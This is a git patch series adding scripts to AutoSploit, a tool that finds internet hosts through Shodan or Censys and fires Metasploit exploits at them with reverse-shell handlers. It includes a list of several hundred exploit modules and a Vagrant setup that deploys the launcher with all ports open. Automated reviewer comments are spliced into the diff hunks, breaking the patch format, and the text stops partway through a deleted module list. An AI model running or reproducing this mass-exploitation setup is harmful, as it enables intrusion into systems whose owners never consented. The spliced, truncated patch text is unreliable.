From 680e509d0a41308f95f321403cc3777b2619e6ef Mon Sep 17 00:00:00 2001
From: selora
Date: Mon, 9 Apr 2018 11:24:58 -0400
Subject: [PATCH 1/9] Scripts to automate autosploit. ./dryrun_autosploit.sh will search censys/shodan/etc and do a dry-run against discovered hosts that are in the whitelist. VALIDATE THE DRYRUN REPORT BEFORE LAUNCHING THE ACTUAL EXPLOIT RUN ./run_autosploit.sh will run autosploit in exploit mode against previously discovered hosts in the whitelist.
---
 dryrun_autosploit.sh | 27 ++++
 etc/json/other_modules.json | 268 ++++++++++++++++++++++++++++++++++++
 run_autosploit.sh | 15 ++
 3 files changed, 310 insertions(+)
 create mode 100644 dryrun_autosploit.sh
 create mode 100644 etc/json/other_modules.json
 create mode 100644 run_autosploit.sh
diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh
new file mode 100644
index 0000000..8ab504b
--- /dev/null
+++ b/dryrun_autosploit.sh
@@ -0,0 +1,27 @@
+#!/usr/bin/env bash
+
+
+if [[ $# -lt 3 ]]; then
+ echo "Syntax:"
+ echo -e "\t./dryrun_autosploit.sh "
+fi
+
+WHITELIST=$1
+SEARCH_QUERY=$2
+LPORT=4444
+
+LHOST=`dig +short @resolver1.opendns.com myip.opendns.com`
+TIMESTAMP=`date +%s`
+
+
+echo "python autosploit.py -s -c -q \"${SEARCH_QUERY}\" --overwrite \
+ --whitelist $WHITELIST -e \
+ -C \"msf_autorun_${TIMESTAMP}\" $LHOST $LPORT \
+ --exploit-file-to-use etc/json/other_modules.json \
+ --dry-run"
+
+python autosploit.py -s -c -q "${SEARCH_QUERY}" --overwrite \
+ --whitelist $WHITELIST -e \
+ -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT \
+ --exploit-file-to-use etc/json/other_modules.json \
+ --dry-run
diff --git a/etc/json/other_modules.json b/etc/json/other_modules.json
new file mode 100644
index 0000000..6652a2c
--- /dev/null
+++ b/etc/json/other_modules.json
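Review bot: `LHOST` comes from `dig +short @resolver1.opendns.com myip.opendns.com` and is never checked, so if dig is missing or the lookup fails the variable is empty and the unquoted `$LHOST $LPORT` collapses to a single positional argument (`4444`), which autosploit would presumably then take as the host. Guard it before the command runs, `[[ -n "$LHOST" ]] || { echo "could not determine LHOST" >&2; exit 1; }`, and quote the expansions (`"$WHITELIST"`, `"$LHOST"`, `"$LPORT"`) so a whitelist path containing spaces is not word-split. The same unchecked lookup and unquoted expansions are in this patch's run_autosploit.sh hunk and survive its later revisions in PATCH 4/9 and PATCH 6/9. The hand-written `echo "python autosploit.py ..."` that mirrors the real command will drift from it over time; `set -x` before the call, or building the command once as an array `cmd=(python autosploit.py ...)` that is both echoed and run via `"${cmd[@]}"`, prints exactly what executes. A `set -euo pipefail` at the top would also turn a failed dig or python invocation into a non-zero exit instead of a silent continue.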
@@ -0,0 +1,268 @@
+{
+ "exploits": [
+ "exploit/windows/ftp/ms09_053_ftpd_nlst",
+ "exploit/windows/firewall/blackice_pam_icq",
+ "exploit/windows/http/amlibweb_webquerydll_app",
+ "exploit/windows/http/ektron_xslt_exec_ws",
+ "exploit/windows/http/umbraco_upload_aspx",
+ "exploit/windows/iis/iis_webdav_scstoragepathfromurl",
+ "exploit/windows/iis/iis_webdav_upload_asp",
+ "exploit/windows/iis/ms01_023_printer",
+ "exploit/windows/iis/ms01_026_dbldecode",
+ "exploit/windows/iis/ms01_033_idq",
+ "exploit/windows/iis/ms02_018_htr",
+ "exploit/windows/iis/ms02_065_msadc",
+ "exploit/windows/iis/ms03_007_ntdll_webdav",
+ "exploit/windows/iis/msadc",
+ "exploit/windows/isapi/ms00_094_pbserver",
+ "exploit/windows/isapi/ms03_022_nsiislog_post",
+ "exploit/windows/isapi/ms03_051_fp30reg_chunked",
+ "exploit/windows/isapi/rsa_webagent_redirect",
+ "exploit/windows/isapi/w3who_query",
+ "exploit/windows/scada/advantech_webaccess_dashboard_file_upload",
+ "exploit/windows/ssl/ms04_011_pct",
+ "exploit/freebsd/http/watchguard_cmd_exec ",
+ "exploit/linux/http/alienvault_exec ",
+ "exploit/linux/http/alienvault_sqli_exec ",
+ "exploit/linux/http/astium_sqli_upload ",
+ "exploit/linux/http/centreon_sqli_exec ",
+ "exploit/linux/http/centreon_useralias_exec ",
+ "exploit/linux/http/crypttech_cryptolog_login_exec ",
+ "exploit/linux/http/dolibarr_cmd_exec ",
+ "exploit/linux/http/goautodial_3_rce_command_injection",
+ "exploit/linux/http/kloxo_sqli ",
+ "exploit/linux/http/nagios_xi_chained_rce ",
+ "exploit/linux/http/netgear_wnr2000_rce ",
+ "exploit/linux/http/pandora_fms_sqli ",
+ "exploit/linux/http/riverbed_netprofiler_netexpress_exe ",
+ "exploit/linux/http/wd_mycloud_multiupload_upload ",
+ "exploit/linux/http/zabbix_sqli ",
+ "exploit/linux/misc/qnap_transcode_server ",
+ "exploit/linux/mysql/mysql_yassl_getname ",
+ "exploit/linux/mysql/mysql_yassl_hello ",
+ "exploit/linux/postgres/postgres_payload ",
+ "exploit/linux/samba/is_known_pipename ",
+ 
"exploit/multi/browser/java_jre17_driver_manager ", + "exploit/multi/http/atutor_sqli ", + "exploit/multi/http/dexter_casinoloader_exec ", + "exploit/multi/http/drupal_drupageddon ", + "exploit/multi/http/manage_engine_dc_pmp_sqli ", + "exploit/multi/http/manageengine_search_sqli ", + "exploit/multi/http/movabletype_upgrade_exec ", + "exploit/multi/http/php_volunteer_upload_exe ", + "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli ", + "exploit/multi/http/splunk_mappy_exec ", + "exploit/multi/http/testlink_upload_exec ", + "exploit/multi/http/zpanel_information_disclosure_rce ", + "exploit/multi/misc/legend_bot_exec ", + "exploit/multi/mysql/mysql_udf_payload ", + "exploit/multi/postgres/postgres_createlang ", + "exploit/solaris/sunrpc/ypupdated_exec ", + "exploit/unix/ftp/proftpd_133c_backdoor ", + "exploit/unix/http/tnftp_savefile ", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce ", + "exploit/unix/webapp/kimai_sqli ", + "exploit/unix/webapp/openemr_sqli_privesc_upload ", + "exploit/unix/webapp/seportal_sqli_exec ", + "exploit/unix/webapp/vbulletin_vote_sqli_exec ", + "exploit/unix/webapp/vicidial_manager_send_cmd_exec", + "exploit/windows/antivirus/symantec_endpoint_manager_rce ", + "exploit/windows/http/apache_mod_rewrite_ldap ", + "exploit/windows/http/ca_totaldefense_regeneratereports", + "exploit/windows/http/cyclope_ess_sqli", + "exploit/windows/http/hp_mpa_job_acct", + "exploit/windows/http/solarwinds_storage_manager_sql", + "exploit/windows/http/sonicwall_scrutinizer_sql", + "exploit/windows/misc/altiris_ds_sqli ", + "exploit/windows/misc/fb_cnct_group ", + "exploit/windows/misc/lianja_db_net ", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce ", + "exploit/windows/mssql/lyris_listmanager_weak_pass ", + "exploit/windows/mssql/ms02_039_slammer ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli ", + "exploit/windows/mssql/mssql_linkcrawler ", + 
"exploit/windows/mssql/mssql_payload ", + "exploit/windows/mssql/mssql_payload_sqli ", + "exploit/windows/mysql/mysql_mof ", + "exploit/windows/mysql/mysql_start_up ", + "exploit/windows/mysql/mysql_yassl_hello", + "exploit/windows/mysql/scrutinizer_upload_exec ", + "exploit/windows/postgres/postgres_payload ", + "exploit/windows/scada/realwin_on_fcs_login", + "exploit/multi/http/rails_actionpack_inline_exec", + "exploit/multi/http/rails_dynamic_render_code_exec", + "exploit/multi/http/rails_json_yaml_code_exec", + "exploit/multi/http/rails_secret_deserialization", + "exploit/multi/http/rails_web_console_v2_code_exec", + "exploit/multi/http/rails_xml_yaml_code_exec", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/phpmoadmin_exec", + "exploit/multi/http/phpmyadmin_3522_backdoor", + "exploit/multi/http/phpmyadmin_preg_replace", + "exploit/multi/http/phpscheduleit_start_date", + "exploit/multi/http/phptax_exec", + "exploit/multi/http/phpwiki_ploticus_exec", + "exploit/multi/http/plone_popen2", + "exploit/multi/http/pmwiki_pagelist", + "exploit/multi/http/joomla_http_header_rce", + "exploit/multi/http/novell_servicedesk_rce", + "exploit/multi/http/oracle_reports_rce", + "exploit/multi/http/php_utility_belt_rce", + "exploit/multi/http/phpfilemanager_rce", + "exploit/multi/http/processmaker_exec", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/spree_search_exec", + "exploit/multi/http/spree_searchlogic_exec", + "exploit/multi/http/struts_code_exec_parameters", + "exploit/multi/http/vtiger_install_rce", + "exploit/multi/http/werkzeug_debug_rce", + "exploit/multi/http/zemra_panel_rce", + "exploit/multi/http/zpanel_information_disclosure_rce", + "exploit/multi/http/joomla_http_header_rce", + "exploit/unix/webapp/joomla_akeeba_unserialize", + "exploit/unix/webapp/joomla_comjce_imgmanager", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce", + "exploit/unix/webapp/joomla_media_upload_exec", + 
"exploit/multi/http/builderengine_upload_exec", + "exploit/multi/http/caidao_php_backdoor_exec", + "exploit/multi/http/atutor_sqli ", + "exploit/multi/http/ajaxplorer_checkinstall_exec", + "exploit/multi/http/apache_activemq_upload_jsp", + "exploit/unix/webapp/wp_lastpost_exec", + "exploit/unix/webapp/wp_mobile_detector_upload_execute", + "exploit/multi/http/axis2_deployer", + "exploit/unix/webapp/wp_foxypress_upload", + "exploit/linux/http/tr064_ntpserver_cmdinject", + "exploit/linux/misc/quest_pmmasterd_bof", + "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload", + "exploit/unix/webapp/php_xmlrpc_eval", + "exploit/unix/webapp/wp_admin_shell_upload", + "exploit/linux/http/sophos_wpa_sblistpack_exec", + "exploit/linux/local/sophos_wpa_clear_keys", + "exploit/multi/http/zpanel_information_disclosure_rce", + "auxiliary/admin/cisco/cisco_asa_extrabacon", + "auxiliary/admin/cisco/cisco_secure_acs_bypass", + "auxiliary/admin/cisco/vpn_3000_ftp_bypass", + "exploit/bsdi/softcart/mercantec_softcart ", + "exploit/freebsd/misc/citrix_netscaler_soap_bof", + "exploit/freebsd/samba/trans2open", + "exploit/linux/ftp/proftp_sreplace ", + "exploit/linux/http/dcos_marathon", + "exploit/linux/http/f5_icall_cmd", + "exploit/linux/http/fritzbox_echo_exec", + "exploit/linux/http/gitlist_exec", + "exploit/linux/http/goautodial_3_rce_command_injection", + "exploit/linux/http/ipfire_bashbug_exec", + "exploit/linux/http/ipfire_oinkcode_exec", + "exploit/linux/http/ipfire_proxy_exec", + "exploit/linux/http/kaltura_unserialize_rce", + "exploit/linux/http/lifesize_uvc_ping_rce", + "exploit/linux/http/nagios_xi_chained_rce", + "exploit/linux/http/netgear_dgn1000_setup_unauth_exec", + "exploit/linux/http/netgear_wnr2000_rce ", + "exploit/linux/http/nuuo_nvrmini_auth_rce", + "exploit/linux/http/nuuo_nvrmini_unauth_rce", + "exploit/linux/http/op5_config_exec", + "exploit/linux/http/pandora_fms_exec", + "exploit/linux/http/pineapple_preconfig_cmdinject", + 
"exploit/linux/http/seagate_nas_php_exec_noauth", + "exploit/linux/http/symantec_messaging_gateway_exec", + "exploit/linux/http/trendmicro_imsva_widget_exec", + "exploit/linux/http/trueonline_billion_5200w_rce", + "exploit/linux/http/trueonline_p660hn_v1_rce", + "exploit/linux/http/trueonline_p660hn_v2_rce", + "exploit/linux/http/vcms_upload", + "exploit/linux/misc/lprng_format_string", + "exploit/linux/misc/mongod_native_helper", + "exploit/linux/misc/ueb9_bpserverd", + "exploit/linux/mysql/mysql_yassl_getname", + "exploit/linux/pop3/cyrus_pop3d_popsubfolders", + "exploit/linux/postgres/postgres_payload", + "exploit/linux/pptp/poptop_negative_read", + "exploit/linux/proxy/squid_ntlm_authenticate", + "exploit/linux/samba/lsa_transnames_heap", + "exploit/linux/samba/setinfopolicy_heap", + "exploit/linux/samba/trans2open", + "exploit/multi/elasticsearch/script_mvel_rce", + "exploit/multi/elasticsearch/search_groovy_script", + "exploit/multi/http/atutor_sqli", + "exploit/multi/http/axis2_deployer", + "exploit/multi/http/familycms_less_exe", + "exploit/multi/http/freenas_exec_raw", + "exploit/multi/http/gestioip_exec", + "exploit/multi/http/glassfish_deployer", + "exploit/multi/http/glpi_install_rce", + "exploit/multi/http/joomla_http_header_rce ", + "exploit/multi/http/makoserver_cmd_exec", + "exploit/multi/http/novell_servicedesk_rc", + "exploit/multi/http/oracle_reports_rce", + "exploit/multi/http/php_utility_belt_rce", + "exploit/multi/http/phpfilemanager_rce", + "exploit/multi/http/phpmyadmin_3522_backdoor", + "exploit/multi/http/phpwiki_ploticus_exec", + "exploit/multi/http/processmaker_exec", + "exploit/multi/http/rails_actionpack_inline_exec", + "exploit/multi/http/rails_dynamic_render_code_exec", + "exploit/multi/http/rails_secret_deserialization", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/simple_backdoors_exec", + "exploit/multi/http/spree_search_exec", + "exploit/multi/http/spree_searchlogic_exec", + 
"exploit/multi/http/struts2_rest_xstream", + "exploit/multi/http/struts_code_exec", + "exploit/multi/http/struts_code_exec_classloader", + "exploit/multi/http/struts_code_exec_parameters", + "exploit/multi/http/struts_dev_mode", + "exploit/multi/http/sysaid_auth_file_upload", + "exploit/multi/http/tomcat_jsp_upload_bypass", + "exploit/multi/http/vtiger_install_rce", + "exploit/multi/http/werkzeug_debug_rce", + "exploit/multi/http/zemra_panel_rce", + "exploit/multi/http/zpanel_information_disclosure_rce", + "exploit/multi/ids/snort_dce_rpc", + "exploit/multi/misc/batik_svg_java", + "exploit/multi/misc/pbot_exec", + "exploit/multi/misc/veritas_netbackup_cmdexec", + "exploit/multi/mysql/mysql_udf_payload", + "exploit/multi/php/php_unserialize_zval_cookie", + "exploit/unix/http/freepbx_callmenum", + "exploit/unix/http/lifesize_room", + "exploit/unix/http/pfsense_clickjacking", + "exploit/unix/http/pfsense_group_member_exec", + "exploit/unix/http/tnftp_savefile", + "exploit/unix/misc/polycom_hdx_traceroute_exec", + "exploit/unix/webapp/awstats_migrate_exec", + "exploit/unix/webapp/carberp_backdoor_exec", + "exploit/unix/webapp/citrix_access_gateway_exec", + "exploit/unix/webapp/dogfood_spell_exec", + "exploit/unix/webapp/invision_pboard_unserialize_exec", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce", + "exploit/unix/webapp/mybb_backdoor", + "exploit/unix/webapp/opensis_modname_exec", + "exploit/unix/webapp/oscommerce_filemanager", + "exploit/unix/webapp/piwik_superuser_plugin_upload", + "exploit/unix/webapp/tikiwiki_upload_exec", + "exploit/unix/webapp/webtester_exec", + "exploit/unix/webapp/wp_phpmailer_host_header", + "exploit/unix/webapp/wp_total_cache_exec", + "exploit/windows/antivirus/symantec_endpoint_manager_rce", + "exploit/windows/http/ektron_xslt_exec", + "exploit/windows/http/ektron_xslt_exec_ws", + "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", + "exploit/windows/http/hp_autopass_license_traversal", + 
"exploit/windows/http/manage_engine_opmanager_rce", + "exploit/windows/http/netgear_nms_rce", + "exploit/windows/http/sepm_auth_bypass_rce", + "exploit/windows/http/trendmicro_officescan_widget_exec", + "exploit/windows/iis/iis_webdav_upload_asp", + "exploit/windows/iis/msadc", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce", + "exploit/windows/novell/file_reporter_fsfui_upload", + "exploit/windows/scada/ge_proficy_cimplicity_gefebt", + "exploit/windows/smb/ipass_pipe_exec", + "exploit/windows/smb/smb_relay", + "auxiliary/sqli/oracle/jvm_os_code_10g", + "auxiliary/sqli/oracle/jvm_os_code_11g" + ] +} diff --git a/run_autosploit.sh b/run_autosploit.sh new file mode 100644 index 0000000..62d0e2b --- /dev/null +++ b/run_autosploit.sh @@ -0,0 +1,15 @@ +#!/usr/bin/env bash + + +if [[ $# -lt 3 ]]; then + echo "Syntax:" + echo -e "\t./run_autosploit.sh " +fi + +WHITELIST=$1 +LPORT=$3 + +LHOST=`dig +short @resolver1.opendns.com myip.opendns.com` +TIMESTAMP=`date +%s` + +python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/other_modules.json From 99c208f3f2ae8cd72e96965b1aa4171d6586b105 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 11:47:48 -0400 Subject: [PATCH 2/9] Added a vagrant config to easily deploy autosploit to aws-lightsail. COMES WITHOUT WARRANTY. Use as a starting point. Tweaks to make it usable for dev: - Setup a synced folder with your autosploit dev in the Vagrantfile Refer to vagrant doc. - Use vagrant rsync-auto Since vagrant file cannot really be shared as-is, some tweakings might be necessary. Try: -Modifying the Vagrantfile according to your ssh keys path -Installing the aws-cli pacakge -Configuring ~/.aws directory --- Vagrant/Vagrantfile | 28 ++++++++++++++++++++++++++++ Vagrant/bootstrap/bootstrap.sh | 20 ++++++++++++++++++++ 2 files changed, 48 insertions(+) create mode 100644 Vagrant/Vagrantfile create mode 100644 Vagrant/bootstrap/bootstrap.sh 
diff --git a/Vagrant/Vagrantfile b/Vagrant/Vagrantfile
new file mode 100644
index 0000000..c427e3a
--- /dev/null
+++ b/Vagrant/Vagrantfile
@@ -0,0 +1,28 @@
+# Use as a strating point to spin up a box in lightsail.
+# the vagrant-lightsail plugin is required
+# You probably also need to:
+# - Configure the ssh keys path
+# - Install and configure the aws-cli package
+
+Vagrant.configure('2') do |config|
+ config.vm.synced_folder ".", "/vagrant", type: "rsync",
+ rsync__exclude: ".git/",
+ rsync__auto: true
+
+ config.ssh.private_key_path = '/path/to/id_rsa'
+ config.ssh.username = 'ubuntu'
+ config.vm.box = 'lightsail'
+ config.vm.box_url = 'https://github.com/thejandroman/vagrant-lightsail/raw/master/box/lightsail.box'
+ config.vm.hostname = 'autosploit-launcher'
+
+ config.vm.provider :lightsail do |provider, override|
+ provider.port_info = [{ from_port: 0, to_port: 65535, protocol:
+ 'all' }]
+ provider.keypair_name = 'id_rsa'
+ provider.bundle_id = 'small_1_0'
+ end
+
+ config.vm.provision "bootstrap", type: "shell", run: "once" do |s|
+ s.path = "./bootstrap/bootstrap.sh"
+ end
+end
diff --git a/Vagrant/bootstrap/bootstrap.sh b/Vagrant/bootstrap/bootstrap.sh
new file mode 100644
index 0000000..5f0a31a
--- /dev/null
+++ b/Vagrant/bootstrap/bootstrap.sh
@@ -0,0 +1,20 @@
+#!/usr/bin/env bash
+
+
+echo "Yolosploit configurator 2.42"
+sudo apt-get --yes update
+sudo apt-get --yes upgrade
+
+echo "Installing metasploit. BE PATIENT (5 min max?)"
+wget --quiet https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
+chmod +x metasploit-latest-linux-x64-installer.run
+sudo ./metasploit-latest-linux-x64-installer.run --unattendedmodeui none --prefix /opt/msf --mode unattended
+
+echo "Installing pyhton2"
+sudo apt-get --yes install python python-pip python-virtualenv git
+
+sudo apt-get --yes install fish
+sudo chsh -s /usr/bin/fish ubuntu
+
+cd ~
+git clone https://github.com/NullArray/AutoSploit
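Review bot: `provider.port_info = [{ from_port: 0, to_port: 65535, protocol: 'all' }]` exposes every port of the Lightsail instance to the internet, so the box that holds the Metasploit install, whatever handlers it listens with and the rsynced repository (whitelist included) is reachable by anyone who scans it. The launcher only needs SSH in and the reverse-handler port the scripts pass as LPORT; restrict it to those, e.g. `provider.port_info = [{ from_port: 22, to_port: 22, protocol: 'tcp' }, { from_port: 4444, to_port: 4444, protocol: 'tcp' }]` (4444 being the default dryrun_autosploit.sh hard-codes). The box is pulled from a third-party GitHub raw URL with no integrity check; setting `config.vm.box_download_checksum` and `config.vm.box_download_checksum_type` keeps a changed box from installing silently. `/path/to/id_rsa` is a placeholder the header comment tells the user to edit, but `provider.keypair_name = 'id_rsa'` also has to match the key pair name registered in Lightsail, which deserves a comment of its own. Nit: `strating` in the first comment line.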
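Review bot: The Metasploit installer is fetched with `wget --quiet` and then executed as root without any check that the download succeeded or that the file is the one the vendor published, so a failed or tampered download still reaches `sudo ./metasploit-latest-linux-x64-installer.run`. Start the script with `set -euo pipefail` so a failing `wget` or `apt-get` aborts the provision, and verify the installer against a checksum obtained out of band before running it, e.g. `echo "<EXPECTED_SHA256>  metasploit-latest-linux-x64-installer.run" | sha256sum -c -` with the real value substituted. Vagrant runs shell provisioners as root unless `privileged: false` is set, so the `sudo` prefixes are presumably redundant and `cd ~` / `git clone` would land in /root rather than in the home of the `ubuntu` user whose login shell is changed — verify which user is intended. `apt-get --yes upgrade` inside an unattended provision can still block on a debconf prompt; `DEBIAN_FRONTEND=noninteractive` in front of the apt calls avoids that. Nit: `pyhton2` in the echo.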
From 1bac9940aea51dbc1d8c7ba6e0ddbb63b7a96a03 Mon Sep 17 00:00:00 2001
From: selora
Date: Mon, 9 Apr 2018 12:19:40 -0400
Subject: [PATCH 3/9] Fixed bash script args
---
 dryrun_autosploit.sh | 2 +-
 run_autosploit.sh | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh
index 8ab504b..f0282a3 100644
--- a/dryrun_autosploit.sh
+++ b/dryrun_autosploit.sh
@@ -1,7 +1,7 @@
 #!/usr/bin/env bash
-if [[ $# -lt 3 ]]; then
+if [[ $# -lt 2 ]]; then
 echo "Syntax:"
 echo -e "\t./dryrun_autosploit.sh "
 fi
diff --git a/run_autosploit.sh b/run_autosploit.sh
index 62d0e2b..98ae47d 100644
--- a/run_autosploit.sh
+++ b/run_autosploit.sh
@@ -1,13 +1,13 @@
 #!/usr/bin/env bash
-if [[ $# -lt 3 ]]; then
+if [[ $# -lt 2 ]]; then
 echo "Syntax:"
 echo -e "\t./run_autosploit.sh "
 fi
 WHITELIST=$1
-LPORT=$3
+LPORT=$2
 LHOST=`dig +short @resolver1.opendns.com myip.opendns.com`
 TIMESTAMP=`date +%s`
From db0db7f69ed2405d1ef5419a93e3f75b5d0bd9d4 Mon Sep 17 00:00:00 2001
From: selora
Date: Mon, 9 Apr 2018 13:04:32 -0400
Subject: [PATCH 4/9] Removed blocking MSF modules from default module list
---
 dryrun_autosploit.sh | 4 +-
 etc/json/default_modules.json | 23 +--
 etc/json/other_modules.json | 268 ----------------------------------
 run_autosploit.sh | 3 +-
 4 files changed, 5 insertions(+), 293 deletions(-)
 delete mode 100644 etc/json/other_modules.json
diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh
index f0282a3..137d5a2 100644
--- a/dryrun_autosploit.sh
+++ b/dryrun_autosploit.sh
@@ -17,11 +17,11 @@ TIMESTAMP=`date +%s`
 echo "python autosploit.py -s -c -q \"${SEARCH_QUERY}\" --overwrite \
 --whitelist $WHITELIST -e \
 -C \"msf_autorun_${TIMESTAMP}\" $LHOST $LPORT \
- --exploit-file-to-use etc/json/other_modules.json \
+ --exploit-file-to-use etc/json/default_modules.json \
 --dry-run"
 python autosploit.py -s -c -q "${SEARCH_QUERY}" --overwrite \
 --whitelist $WHITELIST -e \
 -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT \
- --exploit-file-to-use etc/json/other_modules.json \
+ --exploit-file-to-use etc/json/default_modules.json \
 --dry-run
diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json
index f30a51b..f0e5a65 100644
--- a/etc/json/default_modules.json
+++ b/etc/json/default_modules.json
@@ -263,27 +263,6 @@
 "exploit/windows/smb/ipass_pipe_exec",
 "exploit/windows/smb/smb_relay",
 "auxiliary/sqli/oracle/jvm_os_code_10g",
- "auxiliary/sqli/oracle/jvm_os_code_11g",
- "auxiliary/fuzzers/dns/dns_fuzzer",
- "auxiliary/fuzzers/ftp/client_ftp",
- "auxiliary/fuzzers/ftp/ftp_pre_post",
- "auxiliary/fuzzers/http/http_form_field",
- "auxiliary/fuzzers/http/http_get_uri_long",
- "auxiliary/fuzzers/http/http_get_uri_strings",
- "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
- "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
- "auxiliary/fuzzers/smb/smb_create_pipe",
- "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
- "auxiliary/fuzzers/smb/smb_negotiate_corrupt ",
- "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
- "auxiliary/fuzzers/smb/smb_tree_connect",
- "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
- "auxiliary/fuzzers/smtp/smtp_fuzzer",
- "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
- "auxiliary/fuzzers/ssh/ssh_version_15",
- "auxiliary/fuzzers/ssh/ssh_version_2",
- "auxiliary/fuzzers/ssh/ssh_version_corrupt",
- "auxiliary/fuzzers/tds/tds_login_corrupt",
- "auxiliary/fuzzers/tds/tds_login_username"
+ "auxiliary/sqli/oracle/jvm_os_code_11g"
 ]
 }
diff --git a/etc/json/other_modules.json b/etc/json/other_modules.json
deleted file mode 100644
index 6652a2c..0000000
--- a/etc/json/other_modules.json
+++ /dev/null
@@ -1,268 +0,0 @@ -{ - "exploits": [ - "exploit/windows/ftp/ms09_053_ftpd_nlst", - "exploit/windows/firewall/blackice_pam_icq", - "exploit/windows/http/amlibweb_webquerydll_app", - "exploit/windows/http/ektron_xslt_exec_ws", - "exploit/windows/http/umbraco_upload_aspx", - "exploit/windows/iis/iis_webdav_scstoragepathfromurl", - "exploit/windows/iis/iis_webdav_upload_asp", - "exploit/windows/iis/ms01_023_printer", - "exploit/windows/iis/ms01_026_dbldecode", - "exploit/windows/iis/ms01_033_idq", - "exploit/windows/iis/ms02_018_htr", - "exploit/windows/iis/ms02_065_msadc", - "exploit/windows/iis/ms03_007_ntdll_webdav", - "exploit/windows/iis/msadc", - "exploit/windows/isapi/ms00_094_pbserver", - "exploit/windows/isapi/ms03_022_nsiislog_post", - "exploit/windows/isapi/ms03_051_fp30reg_chunked", - "exploit/windows/isapi/rsa_webagent_redirect", - "exploit/windows/isapi/w3who_query", - "exploit/windows/scada/advantech_webaccess_dashboard_file_upload", - "exploit/windows/ssl/ms04_011_pct", - "exploit/freebsd/http/watchguard_cmd_exec ", - "exploit/linux/http/alienvault_exec ", - "exploit/linux/http/alienvault_sqli_exec ", - "exploit/linux/http/astium_sqli_upload ", - "exploit/linux/http/centreon_sqli_exec ", - "exploit/linux/http/centreon_useralias_exec ", - "exploit/linux/http/crypttech_cryptolog_login_exec ", - "exploit/linux/http/dolibarr_cmd_exec ", - "exploit/linux/http/goautodial_3_rce_command_injection", - "exploit/linux/http/kloxo_sqli ", - "exploit/linux/http/nagios_xi_chained_rce ", - "exploit/linux/http/netgear_wnr2000_rce ", - "exploit/linux/http/pandora_fms_sqli ", - "exploit/linux/http/riverbed_netprofiler_netexpress_exe ", - "exploit/linux/http/wd_mycloud_multiupload_upload ", - "exploit/linux/http/zabbix_sqli ", - "exploit/linux/misc/qnap_transcode_server ", - "exploit/linux/mysql/mysql_yassl_getname ", - "exploit/linux/mysql/mysql_yassl_hello ", - "exploit/linux/postgres/postgres_payload ", - "exploit/linux/samba/is_known_pipename ", - 
"exploit/multi/browser/java_jre17_driver_manager ", - "exploit/multi/http/atutor_sqli ", - "exploit/multi/http/dexter_casinoloader_exec ", - "exploit/multi/http/drupal_drupageddon ", - "exploit/multi/http/manage_engine_dc_pmp_sqli ", - "exploit/multi/http/manageengine_search_sqli ", - "exploit/multi/http/movabletype_upgrade_exec ", - "exploit/multi/http/php_volunteer_upload_exe ", - "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli ", - "exploit/multi/http/splunk_mappy_exec ", - "exploit/multi/http/testlink_upload_exec ", - "exploit/multi/http/zpanel_information_disclosure_rce ", - "exploit/multi/misc/legend_bot_exec ", - "exploit/multi/mysql/mysql_udf_payload ", - "exploit/multi/postgres/postgres_createlang ", - "exploit/solaris/sunrpc/ypupdated_exec ", - "exploit/unix/ftp/proftpd_133c_backdoor ", - "exploit/unix/http/tnftp_savefile ", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce ", - "exploit/unix/webapp/kimai_sqli ", - "exploit/unix/webapp/openemr_sqli_privesc_upload ", - "exploit/unix/webapp/seportal_sqli_exec ", - "exploit/unix/webapp/vbulletin_vote_sqli_exec ", - "exploit/unix/webapp/vicidial_manager_send_cmd_exec", - "exploit/windows/antivirus/symantec_endpoint_manager_rce ", - "exploit/windows/http/apache_mod_rewrite_ldap ", - "exploit/windows/http/ca_totaldefense_regeneratereports", - "exploit/windows/http/cyclope_ess_sqli", - "exploit/windows/http/hp_mpa_job_acct", - "exploit/windows/http/solarwinds_storage_manager_sql", - "exploit/windows/http/sonicwall_scrutinizer_sql", - "exploit/windows/misc/altiris_ds_sqli ", - "exploit/windows/misc/fb_cnct_group ", - "exploit/windows/misc/lianja_db_net ", - "exploit/windows/misc/manageengine_eventlog_analyzer_rce ", - "exploit/windows/mssql/lyris_listmanager_weak_pass ", - "exploit/windows/mssql/ms02_039_slammer ", - "exploit/windows/mssql/ms09_004_sp_replwritetovarbin ", - "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli ", - "exploit/windows/mssql/mssql_linkcrawler ", - 
